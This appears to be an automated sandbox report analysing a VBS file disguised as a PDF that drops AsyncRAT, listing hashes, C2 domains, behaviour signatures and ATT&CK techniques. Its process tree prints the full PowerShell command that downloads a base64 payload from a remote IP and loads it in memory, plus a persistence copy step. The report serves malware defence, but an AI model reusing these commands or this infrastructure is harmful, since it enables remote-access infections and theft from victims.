Overview

overview

10

Static

static

URFT06GSBA...DF.vbs

windows7-x64

10

URFT06GSBA...DF.vbs

windows10-2004-x64

10

URFT06GSBA...DF.exe

windows7-x64

10

URFT06GSBA...DF.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    126s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-09-2022 14:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    URFT06GSBAWRP_001_PDF/RQK02HVBPO_002_PDF.vbs

  • Size

    219KB

  • MD5

    86d9cdbe85e0b345c00063cb59efda75

  • SHA1

    6990625fff03cdc505a7c9a224c39fb9c1b1ab80

  • SHA256

    541752eae29c171bb8ab3f5851b6f58ba58035298b8781990998d22cd4982f6e

  • SHA512

    0f39d5b741cb5fc822f17306537a4659c5ff191f18ef47e18aa3f604eb9d4598f1c01316068285531916a57bd0410b27fd8d44adb3bda41ee691098cd5b1bc2f

  • SSDEEP

    48:DVK0hbQvuivLvyvTxYvsvuiv7vu2vJR2vFvvvfv1KvFvDv2UfHvrvUvgYvc2vGgu:xKWdUIlVc8WGvXimF

Score
10/10
asyncratdefaultrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://20.7.14.99/dll/dll_ink.pdf

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

petersonsherian7.duckdns.org:6739

petersonsherian7.duckdns.org:7301

petersonsherian7.duckdns.org:7808

petersonsherian7.duckdns.org:8333

petersonsherian7.duckdns.org:6112

slpete1533.duckdns.org:6739

slpete1533.duckdns.org:7301

slpete1533.duckdns.org:7808

slpete1533.duckdns.org:8333

slpete1533.duckdns.org:6112
Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

    ratasyncrat
  • Async RAT payload 2 IoCs
    rat
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\URFT06GSBAWRP_001_PDF\RQK02HVBPO_002_PDF.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1928
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('9a82ea0d2fb5-1179-4854-75ce-8a89ca37=nekot&aidem=tla?txt.cnysay/o/moc.topsppa.483ca-dpoj/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2512
      • C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4236
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
          PID:3460
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3176

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      6cf293cb4d80be23433eecf74ddb5503

      SHA1

      24fe4752df102c2ef492954d6b046cb5512ad408

      SHA256

      b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

      SHA512

      0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      6b49e8f169d2f316e251bb33b6966426

      SHA1

      72269ec042c9953fbe2465cd343034b7a7b810a8

      SHA256

      0f5bbb69b875c76e5430b8d3175df55d2cb25cb42b423de593c4d03740d4c506

      SHA512

      b1e3189a8908e2891623302b466f44a55d7afbf1e786b619098242fde5b5c29322f44026a540e9b0b67885c72b0903be7470f5df5608be2e16388ec10e27b952

      Download Submit
    • memory/2512-133-0x0000018A9B8C0000-0x0000018A9B8E2000-memory.dmp
      Filesize

      136KB

      Download
    • memory/2512-134-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/2512-132-0x0000000000000000-mapping.dmp
      Download
    • memory/2512-141-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/3176-144-0x0000000006100000-0x0000000006166000-memory.dmp
      Filesize

      408KB

      Download
    • memory/3176-138-0x000000000040C7CE-mapping.dmp
      Download
    • memory/3176-137-0x0000000000400000-0x0000000000412000-memory.dmp
      Filesize

      72KB

      Download
    • memory/3176-142-0x0000000005FF0000-0x000000000608C000-memory.dmp
      Filesize

      624KB

      Download
    • memory/3176-143-0x0000000006640000-0x0000000006BE4000-memory.dmp
      Filesize

      5.6MB

      Download
    • memory/3176-145-0x0000000006EB0000-0x0000000006F26000-memory.dmp
      Filesize

      472KB

      Download
    • memory/3176-146-0x0000000006F30000-0x0000000006F4E000-memory.dmp
      Filesize

      120KB

      Download
    • memory/3176-147-0x0000000007020000-0x00000000070B2000-memory.dmp
      Filesize

      584KB

      Download
    • memory/4236-136-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4236-135-0x0000000000000000-mapping.dmp
      Download